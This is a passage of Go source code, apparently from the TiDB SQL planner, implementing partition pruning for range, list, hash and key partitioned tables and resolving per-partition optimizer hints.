if colPrune.HasDefault() /* && len(l.listPrune.ColPrunes) > 1 */ {
locations = append(locations,
tables.ListPartitionLocation{
tables.ListPartitionGroup{
PartIdx: l.listPrune.GetDefaultIdx(),
GroupIdxs: []int{-1}, // Special group!
},
})
}
}
for _, location := range locations {
if len(l.partitionNames) > 0 {
for _, pg := range location {
if l.findByName(l.partitionNames, l.pi.Definitions[pg.PartIdx].Name.L) {
helper.UnionPartitionGroup(pg)
}
}
} else {
helper.Union(location)
}
}
}
return helper.GetLocation(), false, nil
}
func (l *listPartitionPruner) detachCondAndBuildRange(conds []expression.Expression, exprCols ...*expression.Column) ([]*ranger.Range, error) {
cols := make([]*expression.Column, 0, len(exprCols))
colLen := make([]int, 0, len(exprCols))
for _, c := range exprCols {
c = c.Clone().(*expression.Column)
cols = append(cols, c)
colLen = append(colLen, types.UnspecifiedLength)
}
detachedResult, err := ranger.DetachCondAndBuildRangeForPartition(l.ctx, conds, cols, colLen, l.ctx.GetSessionVars().RangeMaxSize)
if err != nil {
return nil, err
}
return detachedResult.Ranges, nil
}
func (l *listPartitionPruner) findUsedListColumnsPartitions(conds []expression.Expression) (map[int]struct{}, error) {
if len(conds) == 0 {
return l.fullRange, nil
}
location, isFull, err := l.locatePartitionByCNFCondition(conds)
if err != nil {
return nil, err
}
if isFull {
return l.fullRange, nil
}
used := make(map[int]struct{}, len(location))
for _, pg := range location {
used[pg.PartIdx] = struct{}{}
}
return used, nil
}
func (l *listPartitionPruner) findUsedListPartitions(conds []expression.Expression) (map[int]struct{}, error) {
if len(conds) == 0 {
return l.fullRange, nil
}
exprCols := l.listPrune.PruneExprCols
pruneExpr := l.listPrune.PruneExpr
ranges, err := l.detachCondAndBuildRange(conds, exprCols...)
if err != nil {
return nil, err
}
used := make(map[int]struct{}, len(ranges))
for _, r := range ranges {
if !r.IsPointNullable(l.ctx) {
return l.fullRange, nil
}
if len(r.HighVal) != len(exprCols) {
return l.fullRange, nil
}
value, isNull, err := pruneExpr.EvalInt(l.ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
if err != nil {
return nil, err
}
partitionIdx := l.listPrune.LocatePartition(value, isNull)
if partitionIdx == -1 {
continue
}
if len(l.partitionNames) > 0 && !l.findByName(l.partitionNames, l.pi.Definitions[partitionIdx].Name.L) {
continue
}
used[partitionIdx] = struct{}{}
}
return used, nil
}
func (s *partitionProcessor) findUsedListPartitions(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
conds []expression.Expression, columns []*expression.Column) ([]int, error) {
pi := tbl.Meta().Partition
partExpr := tbl.(partitionTable).PartitionExpr()
listPruner := newListPartitionPruner(ctx, tbl, partitionNames, s, partExpr.ForListPruning, columns)
var used map[int]struct{}
var err error
if partExpr.ForListPruning.ColPrunes == nil {
used, err = listPruner.findUsedListPartitions(conds)
} else {
used, err = listPruner.findUsedListColumnsPartitions(conds)
}
if err != nil {
return nil, err
}
if _, ok := used[FullRange]; ok {
or := partitionRangeOR{partitionRange{0, len(pi.Definitions)}}
return s.convertToIntSlice(or, pi, partitionNames), nil
}
ret := make([]int, 0, len(used))
for k := range used {
ret = append(ret, k)
}
slices.Sort(ret)
return ret, nil
}
func (s *partitionProcessor) pruneListPartition(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
conds []expression.Expression, columns []*expression.Column) ([]int, error) {
used, err := s.findUsedListPartitions(ctx, tbl, partitionNames, conds, columns)
if err != nil {
return nil, err
}
return used, nil
}
func (s *partitionProcessor) prune(ds *DataSource, opt *logicalOptimizeOp) (LogicalPlan, error) {
pi := ds.tableInfo.GetPartitionInfo()
if pi == nil {
return ds, nil
}
// PushDownNot here can convert condition 'not (a != 1)' to 'a = 1'. When we build range from ds.allConds, the condition
// like 'not (a != 1)' would not be handled so we need to convert it to 'a = 1', which can be handled when building range.
// TODO: there may be a better way to push down Not once for all.
for i, cond := range ds.allConds {
ds.allConds[i] = expression.PushDownNot(ds.SCtx(), cond)
}
// Try to locate partition directly for hash partition.
switch pi.Type {
case model.PartitionTypeRange:
return s.processRangePartition(ds, pi, opt)
case model.PartitionTypeHash, model.PartitionTypeKey:
return s.processHashOrKeyPartition(ds, pi, opt)
case model.PartitionTypeList:
return s.processListPartition(ds, pi, opt)
}
// We haven't implement partition by key and so on.
return s.makeUnionAllChildren(ds, pi, fullRange(len(pi.Definitions)), opt)
}
// findByName checks whether object name exists in list.
func (*partitionProcessor) findByName(partitionNames []model.CIStr, partitionName string) bool {
for _, s := range partitionNames {
if s.L == partitionName {
return true
}
}
return false
}
func (*partitionProcessor) name() string {
return "partition_processor"
}
type lessThanDataInt struct {
data []int64
maxvalue bool
}
func (lt *lessThanDataInt) length() int {
return len(lt.data)
}
func compareUnsigned(v1, v2 int64) int {
switch {
case uint64(v1) > uint64(v2):
return 1
case uint64(v1) == uint64(v2):
return 0
}
return -1
}
func (lt *lessThanDataInt) compare(ith int, v int64, unsigned bool) int {
if ith == len(lt.data)-1 {
if lt.maxvalue {
return 1
}
}
if unsigned {
return compareUnsigned(lt.data[ith], v)
}
switch {
case lt.data[ith] > v:
return 1
case lt.data[ith] == v:
return 0
}
return -1
}
// partitionRange represents [start, end)
type partitionRange struct {
start int
end int
}
// partitionRangeOR represents OR(range1, range2, ...)
type partitionRangeOR []partitionRange
func fullRange(end int) partitionRangeOR {
var reduceAllocation [3]partitionRange
reduceAllocation[0] = partitionRange{0, end}
return reduceAllocation[:1]
}
func (or partitionRangeOR) intersectionRange(start, end int) partitionRangeOR {
// Let M = intersection, U = union, then
// a M (b U c) == (a M b) U (a M c)
ret := or[:0]
for _, r1 := range or {
newStart, newEnd := intersectionRange(r1.start, r1.end, start, end)
// Exclude the empty one.
if newEnd > newStart {
ret = append(ret, partitionRange{newStart, newEnd})
}
}
return ret
}
func (or partitionRangeOR) Len() int {
return len(or)
}
func (or partitionRangeOR) Less(i, j int) bool {
return or[i].start < or[j].start
}
func (or partitionRangeOR) Swap(i, j int) {
or[i], or[j] = or[j], or[i]
}
func (or partitionRangeOR) union(x partitionRangeOR) partitionRangeOR {
or = append(or, x...)
return or.simplify()
}
func (or partitionRangeOR) simplify() partitionRangeOR {
// if the length of the `or` is zero. We should return early.
if len(or) == 0 {
return or
}
// Make the ranges order by start.
sort.Sort(or)
sorted := or
// Iterate the sorted ranges, merge the adjacent two when their range overlap.
// For example, [0, 1), [2, 7), [3, 5), ... => [0, 1), [2, 7) ...
res := sorted[:1]
for _, curr := range sorted[1:] {
last := &res[len(res)-1]
if curr.start > last.end {
res = append(res, curr)
} else {
// Merge two.
if curr.end > last.end {
last.end = curr.end
}
}
}
return res
}
func (or partitionRangeOR) intersection(x partitionRangeOR) partitionRangeOR {
if or.Len() == 1 {
return x.intersectionRange(or[0].start, or[0].end)
}
if x.Len() == 1 {
return or.intersectionRange(x[0].start, x[0].end)
}
// Rename to x, y where len(x) > len(y)
var y partitionRangeOR
if or.Len() > x.Len() {
x, y = or, x
} else {
y = or
}
// (a U b) M (c U d) => (x M c) U (x M d), x = (a U b)
res := make(partitionRangeOR, 0, len(y))
for _, r := range y {
// As intersectionRange modify the raw data, we have to make a copy.
tmp := make(partitionRangeOR, len(x))
copy(tmp, x)
tmp = tmp.intersectionRange(r.start, r.end)
res = append(res, tmp...)
}
return res.simplify()
}
// intersectionRange calculate the intersection of [start, end) and [newStart, newEnd)
func intersectionRange(start, end, newStart, newEnd int) (s int, e int) {
if start > newStart {
s = start
} else {
s = newStart
}
if end < newEnd {
e = end
} else {
e = newEnd
}
return s, e
}
func (s *partitionProcessor) pruneRangePartition(ctx sessionctx.Context, pi *model.PartitionInfo, tbl table.PartitionedTable, conds []expression.Expression,
columns []*expression.Column, names types.NameSlice) (partitionRangeOR, error) {
partExpr := tbl.(partitionTable).PartitionExpr()
// Partition by range columns.
if len(pi.Columns) > 0 {
result, err := s.pruneRangeColumnsPartition(ctx, conds, pi, partExpr, columns)
return result, err
}
// Partition by range.
col, fn, mono, err := makePartitionByFnCol(ctx, columns, names, pi.Expr)
if err != nil {
return nil, err
}
result := fullRange(len(pi.Definitions))
if col == nil {
return result, nil
}
// Extract the partition column, if the column is not null, it's possible to prune.
pruner := rangePruner{
lessThan: lessThanDataInt{
data: partExpr.ForRangePruning.LessThan,
maxvalue: partExpr.ForRangePruning.MaxValue,
},
col: col,
partFn: fn,
monotonous: mono,
}
result = partitionRangeForCNFExpr(ctx, conds, &pruner, result)
return result, nil
}
func (s *partitionProcessor) processRangePartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
used, err := s.pruneRangePartition(ds.SCtx(), pi, ds.table.(table.PartitionedTable), ds.allConds, ds.TblCols, ds.names)
if err != nil {
return nil, err
}
return s.makeUnionAllChildren(ds, pi, used, opt)
}
func (s *partitionProcessor) processListPartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
used, err := s.pruneListPartition(ds.SCtx(), ds.table, ds.partitionNames, ds.allConds, ds.TblCols)
if err != nil {
return nil, err
}
if used != nil {
return s.makeUnionAllChildren(ds, pi, convertToRangeOr(used, pi), opt)
}
tableDual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
tableDual.schema = ds.Schema()
appendNoPartitionChildTraceStep(ds, tableDual, opt)
return tableDual, nil
}
// makePartitionByFnCol extracts the column and function information in 'partition by ... fn(col)'.
func makePartitionByFnCol(sctx sessionctx.Context, columns []*expression.Column, names types.NameSlice, partitionExpr string) (*expression.Column, *expression.ScalarFunction, monotoneMode, error) {
monotonous := monotoneModeInvalid
schema := expression.NewSchema(columns...)
tmp, err := expression.ParseSimpleExprsWithNames(sctx, partitionExpr, schema, names)
if err != nil {
return nil, nil, monotonous, err
}
partExpr := tmp[0]
var col *expression.Column
var fn *expression.ScalarFunction
switch raw := partExpr.(type) {
case *expression.ScalarFunction:
args := raw.GetArgs()
// Special handle for floor(unix_timestamp(ts)) as partition expression.
// This pattern is so common for timestamp(3) column as partition expression that it deserve an optimization.
if raw.FuncName.L == ast.Floor {
if ut, ok := args[0].(*expression.ScalarFunction); ok && ut.FuncName.L == ast.UnixTimestamp {
args1 := ut.GetArgs()
if len(args1) == 1 {
if c, ok1 := args1[0].(*expression.Column); ok1 {
return c, raw, monotoneModeNonStrict, nil
}
}
}
}
fn = raw
monotonous = getMonotoneMode(raw.FuncName.L)
// Check the partitionExpr is in the form: fn(col, ...)
// There should be only one column argument, and it should be the first parameter.
if expression.ExtractColumnSet(args...).Len() == 1 {
if col1, ok := args[0].(*expression.Column); ok {
col = col1
}
}
case *expression.Column:
col = raw
}
return col, fn, monotonous, nil
}
func minCmp(ctx sessionctx.Context, lowVal []types.Datum, columnsPruner *rangeColumnsPruner, comparer []collate.Collator, lowExclude bool, gotError *bool) func(i int) bool {
return func(i int) bool {
for j := range lowVal {
expr := columnsPruner.lessThan[i][j]
if expr == nil {
// MAXVALUE
return true
}
con, ok := (*expr).(*expression.Constant)
if !ok {
// Not a constant, pruning not possible, so value is considered less than all partitions
return true
}
// Add Null as point here?
cmp, err := con.Value.Compare(ctx.GetSessionVars().StmtCtx, &lowVal[j], comparer[j])
if err != nil {
*gotError = true
}
if cmp > 0 {
return true
}
if cmp < 0 {
return false
}
}
if len(lowVal) < len(columnsPruner.lessThan[i]) {
// Not all columns given
if lowExclude {
// prefix cols > const, do not include this partition
return false
}
colIdx := len(lowVal)
col := columnsPruner.partCols[colIdx]
conExpr := columnsPruner.lessThan[i][colIdx]
if conExpr == nil {
// MAXVALUE
return true
}
// Possible to optimize by getting minvalue of the column type
// and if lessThan is equal to that
// we can return false, since the partition definition is
// LESS THAN (..., colN, minValOfColM, ... ) which cannot match colN == LowVal
if !mysql.HasNotNullFlag(col.RetType.GetFlag()) {
// NULL cannot be part of the partitioning expression: VALUES LESS THAN (NULL...)
// NULL is allowed in the column and will be considered as lower than any other value
// so this partition needs to be included!
return true
}
if con, ok := (*conExpr).(*expression.Constant); ok && col != nil {
switch col.RetType.EvalType() {
case types.ETInt:
if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
if con.Value.GetUint64() == 0 {
return false
}
} else {
if con.Value.GetInt64() == types.IntergerSignedLowerBound(col.GetType().GetType()) {
return false
}
}
case types.ETDatetime:
if con.Value.GetMysqlTime().IsZero() {
return false
}
case types.ETString:
if len(con.Value.GetString()) == 0 {
return false
}
}
}
// Also if not a constant, pruning not possible, so value is considered less than all partitions
return true
}
return false
}
}
func maxCmp(ctx sessionctx.Context, hiVal []types.Datum, columnsPruner *rangeColumnsPruner, comparer []collate.Collator, hiExclude bool, gotError *bool) func(i int) bool {
return func(i int) bool {
for j := range hiVal {
expr := columnsPruner.lessThan[i][j]
if expr == nil {
// MAXVALUE
return true
}
con, ok := (*expr).(*expression.Constant)
if !ok {
// Not a constant, include every partition, i.e. value is not less than any partition
return false
}
// Add Null as point here?
cmp, err := con.Value.Compare(ctx.GetSessionVars().StmtCtx, &hiVal[j], comparer[j])
if err != nil {
*gotError = true
// error pushed, we will still use the cmp value
}
if cmp > 0 {
return true
}
if cmp < 0 {
return false
}
}
// All hiVal == columnsPruner.lessThan
if len(hiVal) < len(columnsPruner.lessThan[i]) {
// Not all columns given
if columnsPruner.lessThan[i][len(hiVal)] == nil {
// MAXVALUE
return true
}
}
// if point is included, then false, due to LESS THAN
return hiExclude
}
}
func multiColumnRangeColumnsPruner(sctx sessionctx.Context, exprs []expression.Expression,
columnsPruner *rangeColumnsPruner, result partitionRangeOR) partitionRangeOR {
lens := make([]int, 0, len(columnsPruner.partCols))
for i := range columnsPruner.partCols {
lens = append(lens, columnsPruner.partCols[i].RetType.GetFlen())
}
res, err := ranger.DetachCondAndBuildRangeForIndex(sctx, exprs, columnsPruner.partCols, lens, sctx.GetSessionVars().RangeMaxSize)
if err != nil {
return fullRange(len(columnsPruner.lessThan))
}
if len(res.Ranges) == 0 {
if len(res.AccessConds) == 0 && len(res.RemainedConds) == 0 {
// Impossible conditions, like: a > 2 AND a < 1
return partitionRangeOR{}
}
// Could not extract any valid range, use all partitions
return fullRange(len(columnsPruner.lessThan))
}
rangeOr := make([]partitionRange, 0, len(res.Ranges))
comparer := make([]collate.Collator, 0, len(columnsPruner.partCols))
for i := range columnsPruner.partCols {
comparer = append(comparer, collate.GetCollator(columnsPruner.partCols[i].RetType.GetCollate()))
}
gotError := false
// Create a sort.Search where the compare loops over ColumnValues
// Loop over the different ranges and extend/include all the partitions found
for idx := range res.Ranges {
minComparer := minCmp(sctx, res.Ranges[idx].LowVal, columnsPruner, comparer, res.Ranges[idx].LowExclude, &gotError)
maxComparer := maxCmp(sctx, res.Ranges[idx].HighVal, columnsPruner, comparer, res.Ranges[idx].HighExclude, &gotError)
if gotError {
// the compare function returned error, use all partitions.
return fullRange(len(columnsPruner.lessThan))
}
// Can optimize if the range start is types.KindNull/types.MinNotNull
// or range end is types.KindMaxValue
start := sort.Search(len(columnsPruner.lessThan), minComparer)
end := sort.Search(len(columnsPruner.lessThan), maxComparer)
if end < len(columnsPruner.lessThan) {
end++
}
rangeOr = append(rangeOr, partitionRange{start, end})
}
return result.intersection(rangeOr).simplify()
}
func partitionRangeForCNFExpr(sctx sessionctx.Context, exprs []expression.Expression,
pruner partitionRangePruner, result partitionRangeOR) partitionRangeOR {
// TODO: When the ranger/detacher handles varchar_col_general_ci cmp constant bin collation
// remove the check for single column RANGE COLUMNS and remove the single column implementation
if columnsPruner, ok := pruner.(*rangeColumnsPruner); ok && len(columnsPruner.partCols) > 1 {
return multiColumnRangeColumnsPruner(sctx, exprs, columnsPruner, result)
}
for i := 0; i < len(exprs); i++ {
result = partitionRangeForExpr(sctx, exprs[i], pruner, result)
}
return result
}
// partitionRangeForExpr calculate the partitions for the expression.
func partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression,
pruner partitionRangePruner, result partitionRangeOR) partitionRangeOR {
// Handle AND, OR respectively.
if op, ok := expr.(*expression.ScalarFunction); ok {
if op.FuncName.L == ast.LogicAnd {
return partitionRangeForCNFExpr(sctx, op.GetArgs(), pruner, result)
} else if op.FuncName.L == ast.LogicOr {
args := op.GetArgs()
newRange := partitionRangeForOrExpr(sctx, args[0], args[1], pruner)
return result.intersection(newRange)
} else if op.FuncName.L == ast.In {
if p, ok := pruner.(*rangePruner); ok {
newRange := partitionRangeForInExpr(sctx, op.GetArgs(), p)
return result.intersection(newRange)
} else if p, ok := pruner.(*rangeColumnsPruner); ok {
newRange := partitionRangeColumnForInExpr(sctx, op.GetArgs(), p)
return result.intersection(newRange)
}
return result
}
}
// Handle a single expression.
start, end, ok := pruner.partitionRangeForExpr(sctx, expr)
if !ok {
// Can't prune, return the whole range.
return result
}
return result.intersectionRange(start, end)
}
type partitionRangePruner interface {
partitionRangeForExpr(sessionctx.Context, expression.Expression) (start, end int, succ bool)
fullRange() partitionRangeOR
}
var _ partitionRangePruner = &rangePruner{}
// rangePruner is used by 'partition by range'.
type rangePruner struct {
lessThan lessThanDataInt
col *expression.Column
partFn *expression.ScalarFunction
// If partFn is not nil, monotonous indicates partFn is monotonous or not.
monotonous monotoneMode
}
func (p *rangePruner) partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression) (start int, end int, ok bool) {
if constExpr, ok := expr.(*expression.Constant); ok {
if b, err := constExpr.Value.ToBool(sctx.GetSessionVars().StmtCtx); err == nil && b == 0 {
// A constant false expression.
return 0, 0, true
}
}
dataForPrune, ok := p.extractDataForPrune(sctx, expr)
if !ok {
return 0, 0, false
}
unsigned := mysql.HasUnsignedFlag(p.col.RetType.GetFlag())
start, end = pruneUseBinarySearch(p.lessThan, dataForPrune, unsigned)
return start, end, true
}
func (p *rangePruner) fullRange() partitionRangeOR {
return fullRange(p.lessThan.length())
}
// partitionRangeForOrExpr calculate the partitions for or(expr1, expr2)
func partitionRangeForOrExpr(sctx sessionctx.Context, expr1, expr2 expression.Expression,
pruner partitionRangePruner) partitionRangeOR {
tmp1 := partitionRangeForExpr(sctx, expr1, pruner, pruner.fullRange())
tmp2 := partitionRangeForExpr(sctx, expr2, pruner, pruner.fullRange())
return tmp1.union(tmp2)
}
func partitionRangeColumnForInExpr(sctx sessionctx.Context, args []expression.Expression,
pruner *rangeColumnsPruner) partitionRangeOR {
col, ok := args[0].(*expression.Column)
if !ok || col.ID != pruner.partCols[0].ID {
return pruner.fullRange()
}
var result partitionRangeOR
for i := 1; i < len(args); i++ {
constExpr, ok := args[i].(*expression.Constant)
if !ok {
return pruner.fullRange()
}
switch constExpr.Value.Kind() {
case types.KindInt64, types.KindUint64, types.KindMysqlTime, types.KindString: // for safety, only support string,int and datetime now
case types.KindNull:
result = append(result, partitionRange{0, 1})
continue
default:
return pruner.fullRange()
}
// convert all elements to EQ-exprs and prune them one by one
sf, err := expression.NewFunction(sctx, ast.EQ, types.NewFieldType(types.KindInt64), []expression.Expression{col, args[i]}...)
if err != nil {
return pruner.fullRange()
}
start, end, ok := pruner.partitionRangeForExpr(sctx, sf)
if !ok {
return pruner.fullRange()
}
result = append(result, partitionRange{start, end})
}
return result.simplify()
}
func partitionRangeForInExpr(sctx sessionctx.Context, args []expression.Expression,
pruner *rangePruner) partitionRangeOR {
col, ok := args[0].(*expression.Column)
if !ok || col.ID != pruner.col.ID {
return pruner.fullRange()
}
var result partitionRangeOR
unsigned := mysql.HasUnsignedFlag(col.RetType.GetFlag())
for i := 1; i < len(args); i++ {
constExpr, ok := args[i].(*expression.Constant)
if !ok {
return pruner.fullRange()
}
if constExpr.Value.Kind() == types.KindNull {
result = append(result, partitionRange{0, 1})
continue
}
var val int64
var err error
if pruner.partFn != nil {
// replace fn(col) to fn(const)
partFnConst := replaceColumnWithConst(pruner.partFn, constExpr)
val, _, err = partFnConst.EvalInt(sctx, chunk.Row{})
} else {
val, err = constExpr.Value.ToInt64(sctx.GetSessionVars().StmtCtx)
}
if err != nil {
return pruner.fullRange()
}
start, end := pruneUseBinarySearch(pruner.lessThan, dataForPrune{op: ast.EQ, c: val}, unsigned)
result = append(result, partitionRange{start, end})
}
return result.simplify()
}
type monotoneMode int
const (
monotoneModeInvalid monotoneMode = iota
monotoneModeStrict
monotoneModeNonStrict
)
// monotoneIncFuncs are those functions that are monotone increasing.
// For any x y, if x > y => f(x) > f(y), function f is strict monotone .
// For any x y, if x > y => f(x) >= f(y), function f is non-strict monotone.
var monotoneIncFuncs = map[string]monotoneMode{
ast.Year: monotoneModeNonStrict,
ast.ToDays: monotoneModeNonStrict,
ast.UnixTimestamp: monotoneModeStrict,
// Only when the function form is fn(column, const)
ast.Plus: monotoneModeStrict,
ast.Minus: monotoneModeStrict,
}
func getMonotoneMode(fnName string) monotoneMode {
mode, ok := monotoneIncFuncs[fnName]
if !ok {
return monotoneModeInvalid
}
return mode
}
// f(x) op const, op is > = <
type dataForPrune struct {
op string
c int64
}
// extractDataForPrune extracts data from the expression for pruning.
// The expression should have this form: 'f(x) op const', otherwise it can't be pruned.
func (p *rangePruner) extractDataForPrune(sctx sessionctx.Context, expr expression.Expression) (dataForPrune, bool) {
var ret dataForPrune
op, ok := expr.(*expression.ScalarFunction)
if !ok {
return ret, false
}
switch op.FuncName.L {
case ast.EQ, ast.LT, ast.GT, ast.LE, ast.GE:
ret.op = op.FuncName.L
case ast.IsNull:
// isnull(col)
if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && arg0.ID == p.col.ID {
ret.op = ast.IsNull
return ret, true
}
return ret, false
default:
return ret, false
}
var col *expression.Column
var con *expression.Constant
if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && arg0.ID == p.col.ID {
if arg1, ok := op.GetArgs()[1].(*expression.Constant); ok {
col, con = arg0, arg1
}
} else if arg0, ok := op.GetArgs()[1].(*expression.Column); ok && arg0.ID == p.col.ID {
if arg1, ok := op.GetArgs()[0].(*expression.Constant); ok {
ret.op = opposite(ret.op)
col, con = arg0, arg1
}
}
if col == nil || con == nil {
return ret, false
}
// Current expression is 'col op const'
var constExpr expression.Expression
if p.partFn != nil {
// If the partition function is not monotone, only EQ condition can be pruning.
if p.monotonous == monotoneModeInvalid && ret.op != ast.EQ {
return ret, false
}
// If the partition expression is fn(col), change constExpr to fn(constExpr).
constExpr = replaceColumnWithConst(p.partFn, con)
// When the partFn is not strict monotonous, we need to relax the condition < to <=, > to >=.
// For example, the following case doesn't hold:
// col < '2020-02-11 17:34:11' => to_days(col) < to_days(2020-02-11 17:34:11)
// The correct transform should be:
// col < '2020-02-11 17:34:11' => to_days(col) <= to_days(2020-02-11 17:34:11)
if p.monotonous == monotoneModeNonStrict {
ret.op = relaxOP(ret.op)
}
} else {
// If the partition expression is col, use constExpr.
constExpr = con
}
// If the partition expression is related with more than one columns such as 'a + b' or 'a * b' or something else,
// the constExpr may not a really constant when coming here.
// Suppose the partition expression is 'a + b' and we have a condition 'a = 2',
// the constExpr is '2 + b' after the replacement which we can't evaluate.
if !constExpr.ConstItem(sctx.GetSessionVars().StmtCtx) {
return ret, false
}
c, isNull, err := constExpr.EvalInt(sctx, chunk.Row{})
if err == nil && !isNull {
ret.c = c
return ret, true
}
return ret, false
}
// replaceColumnWithConst change fn(col) to fn(const)
func replaceColumnWithConst(partFn *expression.ScalarFunction, con *expression.Constant) *expression.ScalarFunction {
args := partFn.GetArgs()
// The partition function may be floor(unix_timestamp(ts)) instead of a simple fn(col).
if partFn.FuncName.L == ast.Floor {
if ut, ok := args[0].(*expression.ScalarFunction); ok && ut.FuncName.L == ast.UnixTimestamp {
args = ut.GetArgs()
args[0] = con
return partFn
}
}
// No 'copy on write' for the expression here, this is a dangerous operation.
args[0] = con
return partFn
}
// opposite turns > to <, >= to <= and so on.
func opposite(op string) string {
switch op {
case ast.EQ:
return ast.EQ
case ast.LT:
return ast.GT
case ast.GT:
return ast.LT
case ast.LE:
return ast.GE
case ast.GE:
return ast.LE
}
panic("invalid input parameter" + op)
}
// relaxOP relax the op > to >= and < to <=
// Sometime we need to relax the condition, for example:
// col < const => f(col) <= const
// datetime < 2020-02-11 16:18:42 => to_days(datetime) <= to_days(2020-02-11)
// We can't say:
// datetime < 2020-02-11 16:18:42 => to_days(datetime) < to_days(2020-02-11)
func relaxOP(op string) string {
switch op {
case ast.LT:
return ast.LE
case ast.GT:
return ast.GE
}
return op
}
// pruneUseBinarySearch returns the start and end of which partitions will match.
// If no match (i.e. value > last partition) the start partition will be the number of partition, not the first partition!
func pruneUseBinarySearch(lessThan lessThanDataInt, data dataForPrune, unsigned bool) (start int, end int) {
length := lessThan.length()
switch data.op {
case ast.EQ:
// col = 66, lessThan = [4 7 11 14 17] => [5, 5)
// col = 14, lessThan = [4 7 11 14 17] => [4, 5)
// col = 10, lessThan = [4 7 11 14 17] => [2, 3)
// col = 3, lessThan = [4 7 11 14 17] => [0, 1)
pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
start, end = pos, pos+1
case ast.LT:
// col < 66, lessThan = [4 7 11 14 17] => [0, 5)
// col < 14, lessThan = [4 7 11 14 17] => [0, 4)
// col < 10, lessThan = [4 7 11 14 17] => [0, 3)
// col < 3, lessThan = [4 7 11 14 17] => [0, 1)
pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) >= 0 })
start, end = 0, pos+1
case ast.GE:
// col >= 66, lessThan = [4 7 11 14 17] => [5, 5)
// col >= 14, lessThan = [4 7 11 14 17] => [4, 5)
// col >= 10, lessThan = [4 7 11 14 17] => [2, 5)
// col >= 3, lessThan = [4 7 11 14 17] => [0, 5)
pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
start, end = pos, length
case ast.GT:
// col > 66, lessThan = [4 7 11 14 17] => [5, 5)
// col > 14, lessThan = [4 7 11 14 17] => [4, 5)
// col > 10, lessThan = [4 7 11 14 17] => [3, 5)
// col > 3, lessThan = [4 7 11 14 17] => [1, 5)
// col > 2, lessThan = [4 7 11 14 17] => [0, 5)
pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c+1, unsigned) > 0 })
start, end = pos, length
case ast.LE:
// col <= 66, lessThan = [4 7 11 14 17] => [0, 6)
// col <= 14, lessThan = [4 7 11 14 17] => [0, 5)
// col <= 10, lessThan = [4 7 11 14 17] => [0, 3)
// col <= 3, lessThan = [4 7 11 14 17] => [0, 1)
pos := sort.Search(length, func(i int) bool { return lessThan.compare(i, data.c, unsigned) > 0 })
start, end = 0, pos+1
case ast.IsNull:
start, end = 0, 1
default:
start, end = 0, length
}
if end > length {
end = length
}
return start, end
}
func (*partitionProcessor) resolveAccessPaths(ds *DataSource) error {
possiblePaths, err := getPossibleAccessPaths(
ds.SCtx(), &tableHintInfo{indexMergeHintList: ds.indexMergeHints, indexHintList: ds.IndexHints},
ds.astIndexHints, ds.table, ds.DBName, ds.tableInfo.Name, ds.isForUpdateRead, true)
if err != nil {
return err
}
possiblePaths, err = filterPathByIsolationRead(ds.SCtx(), possiblePaths, ds.tableInfo.Name, ds.DBName)
if err != nil {
return err
}
ds.possibleAccessPaths = possiblePaths
return nil
}
func (s *partitionProcessor) resolveOptimizeHint(ds *DataSource, partitionName model.CIStr) error {
// index hint
if len(ds.IndexHints) > 0 {
newIndexHint := make([]indexHintInfo, 0, len(ds.IndexHints))
for _, idxHint := range ds.IndexHints {
if len(idxHint.partitions) == 0 {
newIndexHint = append(newIndexHint, idxHint)
} else {
for _, p := range idxHint.partitions {
if p.String() == partitionName.String() {
newIndexHint = append(newIndexHint, idxHint)
break
}
}
}
}
ds.IndexHints = newIndexHint
}
// index merge hint
if len(ds.indexMergeHints) > 0 {
newIndexMergeHint := make([]indexHintInfo, 0, len(ds.indexMergeHints))
for _, idxHint := range ds.indexMergeHints {
if len(idxHint.partitions) == 0 {
newIndexMergeHint = append(newIndexMergeHint, idxHint)
} else {
for _, p := range idxHint.partitions {
if p.String() == partitionName.String() {
newIndexMergeHint = append(newIndexMergeHint, idxHint)
break
}
}
}
}
ds.indexMergeHints = newIndexMergeHint
}
// read from storage hint
if ds.preferStoreType&preferTiKV > 0 {
if len(ds.preferPartitions[preferTiKV]) > 0 {
ds.preferStoreType ^= preferTiKV
for _, p := range ds.preferPartitions[preferTiKV] {
if p.String() == partitionName.String() {
ds.preferStoreType |= preferTiKV
}
}
}
}
if ds.preferStoreType&preferTiFlash > 0 {
if len(ds.preferPartitions[preferTiFlash]) > 0 {
ds.preferStoreType ^= preferTiFlash
for _, p := range ds.preferPartitions[preferTiFlash] {
if p.String() == partitionName.String() {
ds.preferStoreType |= preferTiFlash
}
}
}
}
if ds.preferStoreType&preferTiFlash != 0 && ds.preferStoreType&preferTiKV != 0 {
ds.SCtx().GetSessionVars().StmtCtx.AppendWarning(
errors.New("hint `read_from_storage` has conflict storage type for the partition " + partitionName.L))
}
return s.resolveAccessPaths(ds)
}
func checkTableHintsApplicableForPartition(partitions []model.CIStr, partitionSet set.StringSet) []string {
var unknownPartitions []string
for _, p := range partitions {
if !partitionSet.Exist(p.L) {
unknownPartitions = append(unknownPartitions, p.L)
}
}
return unknownPartitions
}
func appendWarnForUnknownPartitions(ctx sessionctx.Context, hintName string, unknownPartitions []string) {
if len(unknownPartitions) == 0 {
return
}
warning := fmt.Errorf("unknown partitions (%s) in optimizer hint %s", strings.Join(unknownPartitions, ","), hintName)
ctx.GetSessionVars().StmtCtx.AppendWarning(warning)
}
func (*partitionProcessor) checkHintsApplicable(ds *DataSource, partitionSet set.StringSet) {
for _, idxHint := range ds.IndexHints {
unknownPartitions := checkTableHintsApplicableForPartition(idxHint.partitions, partitionSet)
appendWarnForUnknownPartitions(ds.SCtx(), restore2IndexHint(idxHint.hintTypeString(), idxHint), unknownPartitions)
}
